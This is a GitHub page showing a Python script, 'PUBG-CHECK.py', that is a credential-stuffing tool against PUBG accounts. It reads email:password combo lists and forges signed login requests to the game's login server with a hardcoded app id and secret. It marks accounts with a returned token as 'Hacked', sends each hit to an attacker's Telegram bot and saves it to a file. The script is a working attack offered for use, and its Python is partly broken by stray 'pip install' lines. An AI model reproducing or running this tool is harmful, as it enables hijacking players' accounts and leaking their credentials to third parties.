-
Notifications
You must be signed in to change notification settings - Fork 0
/
PUBG-CHECK.py
75 lines (71 loc) · 2.85 KB
/
PUBG-CHECK.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import os
os.system('clear')
pip install requests
import os
os.system('clear')
pip install hashlib
import os
os.system('clear')
pip install random
import os
os.system('clear')
pip install string
import os
os.system('clear')
pip install time
import os
os.system('clear')
import requests,hashlib,random,string,time
r = requests.session()
print("""
--------------------------------------------------
██████╗ ██╗ ██╗██████╗ ██████╗
██╔══██╗██║ ██║██╔══██╗██╔════╝
██████╔╝██║ ██║██████╔╝██║ ███╗
██╔═══╝ ██║ ██║██╔══██╗██║ ██║
██║ ╚██████╔╝██████╔╝╚██████╔╝
╚═╝ ╚═════╝ ╚═════╝ ╚═════╝
BY : MAHER / @MR_MHR0
--------------------------------------------------
""")
ID= input('[+] Enter YOUR ID : ')
token = input('[+] Enter TOKEN BOT : ')
headPUB = {
"Content-Type": "application/json; charset=utf-8","User-Agent": f"Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-G973N Build/PPR1.910397.817)","Host": "igame.msdkpass.com","Connection": "Keep-Alive","Accept-Encoding": "gzip","Content-Length": "126"}
def CHECK(email,pess):
eml = email
pas = pess
YES = f"""
[✓] HI, MAHER NEW ACC PUBG :
[✓] Email: {eml}
[✓] Pass: {pas}
━━━━━━━━━━━━━"""
NO = f"""
[-] NOT Hacked PUBG :
[-] Email: {eml}
[-] Pass: {pas}
━━━━━━━━━━━━━"""
pes = hashlib.md5(bytes(f'{pas}', encoding='utf-8')).hexdigest()
J = hashlib.md5(bytes("/account/login?account_plat_type=3&appid=dd921eb18d0c94b41ddc1a6313889627&lang_type=tr_TR&os=1{\"account\":\""+eml+"\",\"account_type\":1,\"area_code\":\"\",\"extra_json\":\"\",\"password\":\""+pes+"\"}3ec8cd69d71b7922e2a17445840866b26d86e283", encoding="utf-8")).hexdigest()
url = f"https://igame.msdkpass.com/account/login?account_plat_type=3&appid=dd921eb18d0c94b41ddc1a6313889627&lang_type=tr_TR&os=1&sig={J}"
daPU = "{\"account\":\""+eml+"\",\"account_type\":1,\"area_code\":\"\",\"extra_json\":\"\",\"password\":\""+pes+"\"}"
time.sleep(0.5)
GO=r.get(url, data=daPU,headers=headPUB).text
if '"token"' in GO:
print(YES)
r.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text={YES}\nBY @MR_MHR0 @M0HR_BOT 💸')
with open('NWE-PUBG.txt', 'a') as x:
x.write(eml+':'+pas+' |@MR_MHR0\n')
else:
print(NO)
def FILname():
F = input('[+] Enter the name the combo file : ')
try:
for x in open(F,'r').read().splitlines():
email = x.split(":")[0]
pess = x.split(":")[1]
CHECK(email,pess)
except FileNotFoundError:
print('\n[-] The file name is incorrect !\n')
return FILname()
FILname()